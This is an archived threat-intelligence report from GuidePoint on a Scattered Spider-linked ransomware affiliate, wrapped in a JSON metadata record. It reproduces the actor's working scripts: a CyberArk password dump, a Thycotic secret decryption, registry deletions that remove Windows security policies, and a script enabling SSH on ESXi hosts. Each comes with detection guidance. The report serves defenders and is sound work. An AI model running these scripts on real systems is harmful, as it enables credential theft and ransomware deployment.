{ "id": "e817ae92-2c34-4b69-91de-bbf1526e0da8", "created_at": "2026-04-06T00:16:49.778534Z", "updated_at": "2026-04-10T03:33:15.611462Z", "deleted_at": null, "sha1_hash": "cebcb1adcd7c1aa5a1eda39c5c91bd76bf15d39d", "title": "Worldwide Web: An Analysis of Tactics and Techniques Attributed to Scattered Spider", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 127036, "plain_text": "Worldwide Web: An Analysis of Tactics and Techniques Attributed\r\nto Scattered Spider\r\nBy Jason Baker\r\nPublished: 2024-06-12 · Archived: 2026-04-05 23:36:14 UTC\r\nJune 12, 2024\r\nAdditional authors: Rui Ataide and Hermes Bojaxhi\r\nExecutive Summary\r\nIn early 2024, we identified a current affiliate of the RansomHub RaaS group as a former Alphv/Black Cat\r\naffiliate. We assess with high confidence that the same affiliate is a present or former affiliate of the Scattered\r\nSpider threat group, also tracked as UNC3944, Muddled Libra, Octo Tempest, Scatter Swine, and Starfraud. Our\r\nhigh-confidence assessment is based on the following pieces of evidence observed by GuidePoint’s DFIR and\r\nGRIT practices:\r\nOverlapping tools observed in use as part of the threat actors’ intrusions, including ngrok and Tailscale.\r\nOverlapping tactics, including the use of social engineering to orchestrate victim account password resets,\r\nparticularly with American-accented speakers.\r\nOverlapping techniques, including the search for, decryption of, and use of valid credentials, particularly\r\nthrough CyberArk.\r\nOverlapping victims, based on evidence of past claimed victims attributed to Scattered Spider and/or\r\nAlphv.\r\nWe observed the use of scripts containing multiple step-by-step instructions, which may indicate the use of\r\na systematic playbook. Comments appeared throughout a number of PowerShell and Python scripts that\r\nwere executed by the threat actor on victim devices. At least some of these appear to have originated from\r\noffensive security scripts available on GitHub, including “SecretServerSecretStealer”.\r\nWe also observed the use of commonplace tools by the threat actor, including:\r\nngrok, a reverse proxy/tunneling tool used for remote access.\r\nRemmina, an open source remote desktop client for POSIX-based operating systems.\r\nTailscale, a software-defined mesh virtual private network(VPN) service.\r\nInvestigation Origin\r\nIn early 2024, GuidePoint’s Digital Forensics and Incident Response (DFIR) team responded to an attempted\r\nransomware event seeking to impact an organization’s ESXi environment, an event we later attributed to an\r\nhttps://www.guidepointsecurity.com/blog/worldwide-web-an-analysis-of-tactics-and-techniques-attributed-to-scattered-spider/\r\nPage 1 of 9\n\naffiliate of the RansomHub Ransomware-as-a-Service (RaaS) group. Subsequent threat hunting has led us to\r\nassess with high confidence that the same actor had previously performed successful ransomware attacks under\r\nthe banner of the now-defunct Alphv ransomware group, also known as Black Cat or Noberus. Based on the\r\nobserved threat actor Tactics, Techniques, and Procedures (TTPs), including those presented herein, we can assess\r\nwith high confidence that the actor is either a present or former member of the Scattered Spider affiliate group,\r\nbased on observed overlaps with known Scattered Spider tools, TTPs, and infrastructure. Discussion and\r\nconcurrence from industry peers and law enforcement have supported our assessment to date.\r\nDuring threat hunting and follow-on pivoting by GuidePoint’s Research and Intelligence Team (GRIT), we\r\nuncovered evidence of multiple tools, references to past victim infrastructure, and Python and PowerShell scripts\r\ndating to 2023. Much of this evidence appeared to have been inadvertently “left behind” by the threat actor in a\r\nsurprising lapse in Operational Security (OPSEC), that provided us with unique insight into the actor’s TTPs.\r\nSeveral of these tools and scripts are presented in their entirety in this post, though we have redacted details that\r\nmay disclose past or present victim identities or the ultimate source of the reported information. Where feasible,\r\nwe have assessed the most likely purpose of each script, provided associated MITRE ATT\u0026CK technique details,\r\nand reviewed potential detection or mitigation mechanisms that would have identified the activity as it occurred.\r\nWe hope that this report provides additional insight into an aggressive and sophisticated threat actor and threat\r\ngroup that continues to attack and extort organizations worldwide.\r\nNote: Throughout this report, the word “redacted” is used in place of infrastructure details which may\r\ncompromise the sources and methods of our investigation, and do not reflect actual names of infrastructure.\r\nBackground – Scattered Spider\r\nAccording to a Joint Cybersecurity Advisory from the FBI and CISA, Scattered Spider “is a cybercriminal group\r\nthat targets large companies and their contracted information help desks. Scattered Spider threat actors… have\r\ntypically engaged in data theft for extortion and have also been known to utilize BlackCat/ALPHV ransomware\r\nalongside their usual TTPs.” Scattered Spider has attracted particular attention since 2023 for their skill in social\r\nengineering, with calls to help desks to reset account passwords, “SIM-Swapping” attacks, and abuse of identity\r\nand access management platforms serving as hallmarks of their most high-profile attacks. This skill has been\r\naugmented by the participation of allegedly Western and native-English-speaking affiliates, overcoming\r\ndifficulties in translation and believability that complicate similar efforts for non-English speakers.\r\nScattered Spider actors were first noted as conducting attacks on behalf of the Alphv/Black Cat RaaS group in late\r\n2023, following alleged attacks on Caesars Entertainment and MGM Resorts. Microsoft has noted that the group\r\nhas “monetized their intrusions since at least 2022 by selling SIM swaps to other criminals and performing\r\naccount takeovers of high-net-worth individuals to steal their cryptocurrency.” When Alphv seemingly disbanded\r\nin early 2024, the question arose as to where Scattered Spider actors would affiliate next. Based on our recent\r\nobservations and incident response investigations, at least some portion may now be conducting operations with\r\nthe newly arrived RansomHub RaaS group.\r\nLimited details have also emerged over the past year linking Scattered Spider actors to an online collective dubbed\r\n“the Com,” which has grown to potentially thousands of members since 2018 and has been associated with a wide\r\nhttps://www.guidepointsecurity.com/blog/worldwide-web-an-analysis-of-tactics-and-techniques-attributed-to-scattered-spider/\r\nPage 2 of 9\n\nrange of illicit online activities, often by Western young adults. Wired has described other offshoots of “the Com,”\r\nincluding the harassment and extortion group “764,” as having “targeted thousands of people and victimized\r\ndozens, if not hundreds… using some of the internet’s biggest platforms,” often leading to or encouraging self-harm by children and young adults. In January 2024, 19-year-old Noah Michael Urban was arrested in Florida on\r\ncharges of conspiracy to commit wire fraud, eight counts of wire fraud, and five counts of aggravated identity\r\ntheft, ostensibly stemming from operations linked to Scattered Spider. Scattered Spider presents as a sophisticated\r\nand persistent threat to large organizations and high-net-worth individuals, and–despite the setback of Alphv’s\r\ndisruption–has shown no indication of declining operational activity. Awareness of Scattered Spider’s TTPs is\r\ncrucial to a threat-informed and intelligence-driven defense, and we are hopeful that the information provided\r\nherein will aid in enterprise detection and response efforts.\r\nObserved Tooling\r\nSecretServerSecretStealer\r\nSecretServerSecretStealer is a PowerShell script that allows for the decryption of passwords (and other items)\r\nstored within a Thycotic Secret Server[1] installation. Two methods are involved: Invoke-SecretDecrypt and\r\nInvoke-SecretStealer.\r\n“Invoke-SecretDecrypt” requires the manual passing of the various data needed to decrypt a single secret.\r\n“Invoke-SecretStealer” is designed to be run on a Thycotic Secret Server machine itself and takes only\r\nthe web root as a parameter. The SecretStealer will decrypt the database configuration and connect to the\r\napplication’s database. All relevant information is extracted, and all secrets are decrypted.\r\nWe identified the use of SecretServerSecretStealer by the threat actor, as evidenced by multiple PowerShell scripts\r\nleveraging the project’s cmdlets. The use of SecretServerSecretStealer has likely been tied to operators of multiple\r\ngroups; “Evil Corp,” also tracked as UNC2165, has been reported to use SecretServerSecretStealer by Mandiant\r\nand the Department of Health and Human Services.\r\nRelevant MITRE ATT\u0026CK Techniques:\r\nT1212, Exploitation for Credential Access\r\nngrok\r\nAccording to MITRE ATT\u0026CK, ngrok (S0508) is a legitimate reverse proxy tool that can create a secure tunnel\r\nto servers located behind firewalls or on local machines that do not have a public IP. Threat actors have leveraged\r\nngrok in several campaigns, including for lateral movement and data exfiltration. We identified the threat actor’s\r\nuse of ngrok as evidenced by forensic artifacts and observable configuration details. Scattered Spider’s use of\r\nngrok has been identified in a Joint FBI-CISA Cybersecurity Advisory on the group.\r\nRelevant MITRE ATT\u0026CK Techniques:\r\nT1572, Protocol Tunneling; ngrok can tunnel RDP and other services securely over internet connections\r\nT1090, Proxy; ngrok can be used to proxy connections to machines located behind NAT or firewalls\r\nhttps://www.guidepointsecurity.com/blog/worldwide-web-an-analysis-of-tactics-and-techniques-attributed-to-scattered-spider/\r\nPage 3 of 9\n\nDetection Opportunities:\r\nTo establish its tunnel, ngrok fetches ngrok tunneling server domains and IP addresses from this URL\r\n(https://s3.amazonaws.com/dns.ngrok.com/tunnel.json), which can be used to identify firewall and DNS\r\nlog queries\r\nngrok is typically used to connect over the Remote Desktop Protocol (RDP) on Windows Systems; RDP\r\nconnections can be monitored, alerted on, and reviewed in Microsoft’s event logs.\r\nOpen Source Sigma rules are available to detect the command line parameters of ngrok, such as this one\r\nfrom SigmaHQ.\r\nRemmina\r\nWe identified the use of Remmina, an open-source remote desktop client for POSIX-based operating systems,\r\nbased on command-line instructions for installation via BASH. Remmina would very likely have been used on the\r\nthreat actor’s system to connect remotely to victim infrastructure. We note that the observed installation\r\ninstructions also called for the installation of associated plugins for the RDP and SPICE protocols.\r\nRelevant MITRE ATT\u0026CK Techniques:\r\nT1021, Remote Services\r\nT1021.001, Remote Services: Remote Desktop Protocol\r\nObserved Scripts\r\nRetrieving CyberArk Account Information With Valid Credentials – PowerShell Script\r\nBoth Mandiant and Reliaquest have reported Scattered Spider’s targeting of CyberArk for credential theft and\r\nlateral movement.  We observed similar behavior and capabilities demonstrated by the group, in the form of the\r\nbelow PowerShell script that we discovered in the course of our threat hunts. This script interacts with the\r\nCyberArk Privileged Access Security (PAS) solution to pull account information from safes and export it to a\r\nCSV file, almost certainly supporting follow-on lateral movement and persistence in the course of their intrusion.\r\nThe script checks to ensure that the psPAS module is installed (and installs it if not), sets valid CyberArk\r\ncredentials as variables, authenticates with privileged access using those variables, pulls account information from\r\nCyberArk PAS safes, retrieves their passwords, and exports the data to a CSV file.\r\nif (!(Get-Module \"psPAS\")) {\r\n Import-Module \"psPAS\"\r\n}\r\n$baseURL = \"Redacted – Victim URL\"\r\n$outputFile = \"New_Export.csv\"\r\n$firstRun = $true\r\nNew-PASSession -BaseURI $baseURL\r\nhttps://www.guidepointsecurity.com/blog/worldwide-web-an-analysis-of-tactics-and-techniques-attributed-to-scattered-spider/\r\nPage 4 of 9\n\n$safes = Get-PASSafe\r\nforeach ($safe in $safes) {\r\n Write-Host \"Pulling Accounts from Safe: \" $safe.safeName`... -NoNewLine\r\n $accounts = Get-PASAccount -safeName $safe.safeName\r\n Write-Host \"Done!\" -ForegroundColor Green\r\n foreach ($account in $accounts) {\r\n $date = Get-Date -Format yyyy-MM-dd\r\n Write-Host \"Getting current password for\" $account.name`... -NoNewLine\r\n try{\r\n $currentPW = Get-PASAccountPassword -AccountID $account.id -Reason Work\r\n }\r\n catch{\r\n $currentPW = Get-PASAccountPassword -AccountID $account.id -Reason Work -TicketID \"null\"\r\n }\r\n Write-Host \"Done!\" -ForegroundColor Green\r\n $outputCSV = New-Object -TypeName PSobject -Property @{\r\n DatePulled = $date\r\n Safe = $account.safeName\r\n ObjectID = $account.name\r\n UserName = $account.userName\r\n Password = $currentPW.Password\r\n }\r\n if ($firstRun -ne $false) {\r\n $outputCSV | Select-Object -Property DatePulled,Safe,ObjectID,UserName,Password | ConvertTo-Csv -NoTy\r\n Add-Content $outputFile\r\n } else {\r\n $outputCSV | Select-Object -Property DatePulled,Safe,ObjectID,UserName,Password | ConvertTo-Csv -NoTy\r\n Select-Object -Skip 1 | Add-Content $outputFile\r\n }\r\n $firstRun = $false\r\n }\r\n}\r\nRelevant MITRE ATT\u0026CK Techniques:\r\nT1059.01, Command and Scripting Interpreter: PowerShell\r\nT1087, Account Discovery\r\nT1212, Exploitation for Credential Access\r\nT1552, Unsecured Credentials\r\nT1555, Credentials from Password Stores\r\nDetection Opportunities\r\nFor organizations with PowerShell module logging, script block logging, and transcription enabled, this\r\nscript may be detectable via Sigma rules based on the details of this script. Details may also be discovered\r\nusing retroactive threat hunts.\r\nhttps://www.guidepointsecurity.com/blog/worldwide-web-an-analysis-of-tactics-and-techniques-attributed-to-scattered-spider/\r\nPage 5 of 9\n\nE.g., CommandLine:'*Get-PASAccountPassword* -AccountID*'\r\nThycotic Secrets Dump Decryption – PowerShell Script\r\nWhile we have not observed reporting explicitly indicating Scattered Spider’s targeting of Thycotic, we assess\r\nwith high confidence that the group’s actors would have similar interest in targeting the platform for the same\r\npurposes as CyberArk. We discovered the below PowerShell script in the course of our threat hunts, which uses\r\nPowerShell cmdlets to route the results of a Thycotic Secrets Dump to a CSV file, load the CSV file, then iterate\r\nthrough the CSV file to decrypt each secret using the Invoke-SecretDecrypt method of the\r\nSecretServerSecretStealer project. The decrypted secrets are then appended to an outputted CSV file. This script\r\nmay be intended as a follow-on action to the thycotic_secretserver_dump module of Metasploit.\r\n$csvPath = \"C:\\Redacted\\thycotic dump\\out.csv\"\r\n$masterkey = \"Redacted\"\r\n$outputPath = \"C:\\Redacted\\thycotic dump\\final.csv\"\r\n$secrets = Import-Csv $csvPath\r\nforeach ($secret in $secrets) {\r\n $decryptedValue = Invoke-SecretDecrypt -EncryptionConfig .\\encryption.config -NewFormat -Key $secret.Key.Sub\r\n $outputObject = [PsCustomObject]@{\r\n SecretName = $secret.SecretName\r\n SecretFieldName = $secret.SecretFieldName\r\n DecryptedValue = $decryptedValue\r\n }\r\n $outputObject | Export-Csv -Path $outputPath -Append -NoTypeInformation\r\n}\r\nWrite-Output \"Decryption complete. Output saved to $outputPath\"\r\nRelevant MITRE ATT\u0026CK Techniques:\r\nT1212, Exploitation for Credential Access\r\nT1552, Unsecured Credentials\r\nT1555, Credentials from Password Stores\r\nDetection Opportunities:\r\nFor organizations with PowerShell module logging, script block logging, and transcription enabled, this\r\nscript may be detectable via Sigma rules based on the details of this script. Details may also be discovered\r\nusing retroactive threat hunts.\r\nE.g., CommandLine: '*Invoke-SecretDecrypt*'\r\nWindows Registry Subkey Deletion – Batch Script\r\nhttps://www.guidepointsecurity.com/blog/worldwide-web-an-analysis-of-tactics-and-techniques-attributed-to-scattered-spider/\r\nPage 6 of 9\n\nWe discovered the below batch script in the course of our threat hunting efforts. The batch script, which deletes\r\nmultiple registry subkeys and entries, is almost certainly intended to circumvent Virus and Threat protection\r\nsettings in Windows, presumably in support of defense evasion efforts. The reg delete command deletes the\r\nexisting registry subkey or entry without asking for confirmation by using the /f parameter. Of note, the\r\ncommands issued as part of this script have been repeatedly recommended in Microsoft Community forums by\r\nmoderators as a remedial step to overcome organizational settings and controls.\r\nreg delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\" /f\r\nreg delete \"HKCU\\Software\\Microsoft\\WindowsSelfHost\" /f\r\nreg delete \"HKCU\\Software\\Policies\" /f\r\nreg delete \"HKLM\\Software\\Microsoft\\Policies\" /f\r\nreg delete \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\" /f\r\nreg delete \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\WindowsStore\\WindowsUpdate\" /f\r\nreg delete \"HKLM\\Software\\Microsoft\\WindowsSelfHost\" /f\r\nreg delete \"HKLM\\Software\\Policies\" /f\r\nreg delete \"HKLM\\Software\\WOW6432Node\\Microsoft\\Policies\" /f\r\nreg delete \"HKLM\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Policies\" /f\r\nreg delete \"HKLM\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\WindowsStore\\WindowsUpdate\" /f\r\nRelevant MITRE ATT\u0026CK Techniques:\r\nT1059, Command and Scripting Interpreter\r\nT1112, Modify Registry\r\nDetection Opportunities:\r\nSigma rules can be built based on the CommandLine details of this script\r\nE.g., CommandLine: '*reg delete \"HKCU\\\\Software\\\\Microsoft\\\\WindowsSelfHost\" /f*'\r\nSigma rules can be built based on the TargetObject of the above referenced Registry Subkeys\r\nESXi Discovery and SSH Enabling – PowerShell Script\r\nWe discovered the below PowerShell script in the course of our threat hunting efforts and have noted that it likely\r\nserves to facilitate discovery and increase the susceptibility of an organization’s ESXi environment to subsequent\r\nencryptor deployment. This script connects to a vCenter Server, retrieves all ESXi hosts, and configures the SSH\r\nservice on each host to start automatically, allowing external SSH connections. In other instances, we also\r\nobserved the use of a similar script to reset the ESXi root user password and then disconnect from the vCenter\r\nServer.\r\nConnect-VIServer -Server [Redacted] -User root -Password [Redacted]\r\n$esxiHosts = Get-VMHost\r\nforeach ($esxiHost in $esxiHosts) {\r\n $sshService = Get-VMHostService -VMHost $esxiHost | Where { $_.Key -eq \"TSM-SSH\"}\r\nhttps://www.guidepointsecurity.com/blog/worldwide-web-an-analysis-of-tactics-and-techniques-attributed-to-scattered-spider/\r\nPage 7 of 9\n\n$sshService.Policy.StartPolicy = \"start\"\r\n Set-VMHostService -VMHost $esxiHost -Service $sshService\r\n}\r\nDisconnect-VIServer -Server [Redacted] -Confirm:$false\r\nRelevant MITRE ATT\u0026CK Techniques:\r\nT0846, Remote System Discovery\r\nT1021.004, Remote Services: SSH\r\nT1059.01, Command and Scripting Interpreter: PowerShell\r\nDetection Opportunities:\r\nFor organizations with PowerShell module logging, script block logging, and transcription enabled, this\r\nscript may be detectable via Sigma rules based on the details of this script. Details may also be discovered\r\nusing retroactive threat hunts.\r\nE.g., CommandLine:'*Disconnect-VIServer* -Server * -Confirm:$false*'\r\nEncryptor Delivery to ESXi Hosts via SSH – Python Script\r\nFinally, among the scripts discovered as “left behind” by the threat actor was a seemingly customized Python\r\nScript designed to establish an SSH connection with prospective victim ESXi servers, transfer the encryptor via\r\nSFTP, verify the successful transfer of the encryptor, and execute the encryptor across multiple servers in parallel.\r\nMITRE, Avertium, and Aon have all described the use of SSH and the encryption of ESXi environments as\r\ncharacteristic of Scattered Spider operations, though we note that these details are shared by multiple ransomware\r\nand extortion groups. This script would likely be used following the ESXi discovery and SSH enabling script\r\nabove in order to maximize its impact. The script uses previously acquired ESXi IP addresses and credentials to\r\nperform the actions recursively across an environment.\r\nRelevant MITRE ATT\u0026CK Techniques:\r\nT1021.004, Remote Services: SSH\r\nT1059.006, Command and Scripting Interpreter: Python\r\nT1105, Ingress Tool Transfer\r\nT1486, Data Encrypted for Impact\r\nDetection Opportunities:\r\nInstallation of Python on an unexpected server.\r\nSSH connections from a Windows server in a short period of time to multiple ESXi hosts.\r\nEDR telemetry on network connections from a Python executable to ESXi infrastructure from unexpected\r\nlocations\r\nConclusion\r\nhttps://www.guidepointsecurity.com/blog/worldwide-web-an-analysis-of-tactics-and-techniques-attributed-to-scattered-spider/\r\nPage 8 of 9\n\nOver the course of this report, we have highlighted tools and scripts employed by a suspected Scattered Spider\r\nactor in the course of double-extortion ransomware operations, which they appear to have continued from Alphv-aligned operations into RansomHub-aligned operations. The actor takes advantage of open source tooling,\r\nincluding ngrok, Remmina, and Tailscale, commonly used by ransomware actors for remote access and command\r\nand control, and also employs a series of PowerShell and Python scripts to perform credential theft, lateral\r\nmovement, privilege escalation, command and control, and actions on objectives.\r\nIn addition to the TTPs described in this report, we note that social engineering, particularly as it pertains to\r\nlegitimate account takeovers, remains emblematic of Scattered Spider operations. Each of our incident response\r\ninvestigations that have involved a known or suspected Scattered Spider actor has included some element of social\r\nengineering, with the most common being the deception of help desk personnel for the purpose of account\r\npassword resets or multifactor authentication setup. User education and processes designed to verify the identity\r\nof callers are the two most effective means of combatting this tactic, which will almost always pass undetected\r\nunless reported by employees.\r\nFinally, we wish to highlight the “good news” – This threat actor’s use of open-source tools and likely\r\npreformulated scripts are not indicative of a highly innovative and novel threat, but instead align with threats\r\ncommonly posed by most prolific ransomware groups – albeit with a greater emphasis on identity and access\r\nmanagement. The threat actor’s primary advantage over other groups thus lies mainly in their ability to\r\npersistently and convincingly conduct social engineering operations, and to remain persistent in their attempts to\r\ngain unauthorized access until detected and evicted. In at least one case with which we are familiar, Scattered\r\nSpider actors did not attempt reentry once successfully evicted from a target environment, suggesting that the\r\ngroup’s operations may be opportunistic in nature rather than highly focused on successfully compromising\r\nspecific targets.\r\nSharing of threat intelligence information ranging from the atomic to the behavioral remains one of our greatest\r\npotential advantages as Defenders. Properly analyzed and disseminated, there is little reason for today’s adversary\r\nTTPs to work a year from now. We encourage our industry peers and partners to proactively share similar\r\ninformation with the wider community in the interest of raising our collective defenses and increasing the barriers\r\nour adversaries must surmount to achieve their objectives.\r\n[1]Thycotic Secret Server is a Privileged Access Management (PAM) solution that offers a centralized vault to\r\nstore sensitive information such as passwords, keys, and certificates for access by authorized personnel.\r\nSource: https://www.guidepointsecurity.com/blog/worldwide-web-an-analysis-of-tactics-and-techniques-attributed-to-scattered-spider/\r\nhttps://www.guidepointsecurity.com/blog/worldwide-web-an-analysis-of-tactics-and-techniques-attributed-to-scattered-spider/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.guidepointsecurity.com/blog/worldwide-web-an-analysis-of-tactics-and-techniques-attributed-to-scattered-spider/" ], "report_names": [ "worldwide-web-an-analysis-of-tactics-and-techniques-attributed-to-scattered-spider" ], "threat_actors": [ { "id": "1b1271d2-e9a2-4fc5-820b-69c9e4cfb312", "created_at": "2024-06-07T02:00:03.998431Z", "updated_at": "2026-04-10T02:00:03.64336Z", "deleted_at": null, "main_name": "RansomHub", "aliases": [], "source_name": "MISPGALAXY:RansomHub", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9ddc7baf-2ea7-4294-af2c-5fce1021e8e8", "created_at": "2023-06-23T02:04:34.386651Z", "updated_at": "2026-04-10T02:00:04.772256Z", "deleted_at": null, "main_name": "Muddled Libra", "aliases": [ "0ktapus", "Scatter Swine", "Scattered Spider" ], "source_name": "ETDA:Muddled Libra", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "7da6012f-680b-48fb-80c4-1b8cf82efb9c", "created_at": "2023-11-01T02:01:06.643737Z", "updated_at": "2026-04-10T02:00:05.340198Z", "deleted_at": null, "main_name": "Scattered Spider", "aliases": [ "Scattered Spider", "Roasted 0ktapus", "Octo Tempest", "Storm-0875", "UNC3944" ], "source_name": "MITRE:Scattered Spider", "tools": [ "WarzoneRAT", "Rclone", "LaZagne", "Mimikatz", "Raccoon Stealer", "ngrok", "BlackCat", "ConnectWise" ], "source_id": "MITRE", "reports": null }, { "id": "50068c14-343c-4491-b568-df41dd59551c", "created_at": "2022-10-25T15:50:23.253218Z", "updated_at": "2026-04-10T02:00:05.234464Z", "deleted_at": null, "main_name": "Indrik Spider", "aliases": [ "Indrik Spider", "Evil Corp", "Manatee Tempest", "DEV-0243", "UNC2165" ], "source_name": "MITRE:Indrik Spider", "tools": [ "Mimikatz", "PsExec", "Dridex", "WastedLocker", "BitPaymer", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "c3b908de-3dd1-4e5d-ba24-5af8217371f0", "created_at": "2023-10-03T02:00:08.510742Z", "updated_at": "2026-04-10T02:00:03.374705Z", "deleted_at": null, "main_name": "Scattered Spider", "aliases": [ "UNC3944", "Scattered Swine", "Octo Tempest", "DEV-0971", "Starfraud", "Muddled Libra", "Oktapus", "Scatter Swine", "0ktapus", "Storm-0971" ], "source_name": "MISPGALAXY:Scattered Spider", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b296f34c-c424-41da-98bf-90312a5df8ef", "created_at": "2024-06-19T02:03:08.027585Z", "updated_at": "2026-04-10T02:00:03.621193Z", "deleted_at": null, "main_name": "GOLD DRAKE", "aliases": [ "Evil Corp", "Indrik Spider ", "Manatee Tempest " ], "source_name": "Secureworks:GOLD DRAKE", "tools": [ "BitPaymer", "Cobalt Strike", "Covenant", "Donut", "Dridex", "Hades", "Koadic", "LockBit", "Macaw Locker", "Mimikatz", "Payload.Bin", "Phoenix CryptoLocker", "PowerShell Empire", "PowerSploit", "SocGholish", "WastedLocker" ], "source_id": "Secureworks", "reports": null }, { "id": "86ab9be8-ce67-4866-9f66-1df471e9d251", "created_at": "2024-05-29T02:00:03.942487Z", "updated_at": "2026-04-10T02:00:03.641939Z", "deleted_at": null, "main_name": "Alpha Spider", "aliases": [ "ALPHV Ransomware Group" ], "source_name": "MISPGALAXY:Alpha Spider", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b", "created_at": "2022-10-25T16:07:23.303713Z", "updated_at": "2026-04-10T02:00:04.530417Z", "deleted_at": null, "main_name": "ALPHV", "aliases": [ "ALPHV", "ALPHVM", "Ambitious Scorpius", "BlackCat Gang", "UNC4466" ], "source_name": "ETDA:ALPHV", "tools": [ "ALPHV", "ALPHVM", "BlackCat", "GO Simple Tunnel", "GOST", "Impacket", "LaZagne", "MEGAsync", "Mimikatz", "Munchkin", "Noberus", "PsExec", "Remcom", "RemoteCommandExecution", "WebBrowserPassView" ], "source_id": "ETDA", "reports": null }, { "id": "d093e8d9-b093-47b8-a988-2a5cbf3ccec9", "created_at": "2023-10-14T02:03:13.99057Z", "updated_at": "2026-04-10T02:00:04.531987Z", "deleted_at": null, "main_name": "Scattered Spider", "aliases": [ "0ktapus", "LUCR-3", "Muddled Libra", "Octo Tempest", "Scatter Swine", "Scattered Spider", "Star Fraud", "Storm-0875", "UNC3944" ], "source_name": "ETDA:Scattered Spider", "tools": [ "ADRecon", "AnyDesk", "ConnectWise", "DCSync", "FiveTran", "FleetDeck", "Govmomi", "Hekatomb", "Impacket", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "Lumma Stealer", "LummaC2", "Mimikatz", "Ngrok", "PingCastle", "ProcDump", "PsExec", "Pulseway", "Pure Storage FlashArray", "Pure Storage FlashArray PowerShell SDK", "RedLine Stealer", "Rsocx", "RustDesk", "ScreenConnect", "SharpHound", "Socat", "Spidey Bot", "Splashtop", "Stealc", "TacticalRMM", "Tailscale", "TightVNC", "VIDAR", "Vidar Stealer", "WinRAR", "WsTunnel", "gosecretsdump" ], "source_id": "ETDA", "reports": null }, { "id": "9806f226-935f-48eb-b138-6616c9bb9d69", "created_at": "2022-10-25T16:07:23.73153Z", "updated_at": "2026-04-10T02:00:04.729977Z", "deleted_at": null, "main_name": "Indrik Spider", "aliases": [ "Blue Lelantos", "DEV-0243", "Evil Corp", "G0119", "Gold Drake", "Gold Winter", "Manatee Tempest", "Mustard Tempest", "UNC2165" ], "source_name": "ETDA:Indrik Spider", "tools": [ "Advanced Port Scanner", "Agentemis", "Babuk", "Babuk Locker", "Babyk", "BitPaymer", "Bugat", "Bugat v5", "Cobalt Strike", "CobaltStrike", "Cridex", "Dridex", "EmPyre", "EmpireProject", "FAKEUPDATES", "FakeUpdate", "Feodo", "FriedEx", "Hades", "IEncrypt", "LINK_MSIEXEC", "MEGAsync", "Macaw Locker", "Metasploit", "Mimikatz", "PayloadBIN", "Phoenix Locker", "PowerShell Empire", "PowerSploit", "PsExec", "QNAP-Worm", "Raspberry Robin", "RaspberryRobin", "SocGholish", "Vasa Locker", "WastedLoader", "WastedLocker", "cobeacon", "wp_encrypt" ], "source_id": "ETDA", "reports": null }, { "id": "e424a2db-0f5a-4ee5-96d2-5ab16f1f3824", "created_at": "2024-06-19T02:03:08.062614Z", "updated_at": "2026-04-10T02:00:03.655475Z", "deleted_at": null, "main_name": "GOLD HARVEST", "aliases": [ "Octo Tempest ", "Roasted 0ktapus ", "Scatter Swine ", "Scattered Spider ", "UNC3944 " ], "source_name": "Secureworks:GOLD HARVEST", "tools": [ "AnyDesk", "ConnectWise Control", "Logmein" ], "source_id": "Secureworks", "reports": null }, { "id": "6c4f98b3-fe14-42d6-beaa-866395455e52", "created_at": "2023-01-06T13:46:39.169554Z", "updated_at": "2026-04-10T02:00:03.23458Z", "deleted_at": null, "main_name": "Evil Corp", "aliases": [ "GOLD DRAKE" ], "source_name": "MISPGALAXY:Evil Corp", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434609, "ts_updated_at": 1775791995, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/cebcb1adcd7c1aa5a1eda39c5c91bd76bf15d39d.pdf", "text": "https://archive.orkl.eu/cebcb1adcd7c1aa5a1eda39c5c91bd76bf15d39d.txt", "img": "https://archive.orkl.eu/cebcb1adcd7c1aa5a1eda39c5c91bd76bf15d39d.jpg" } }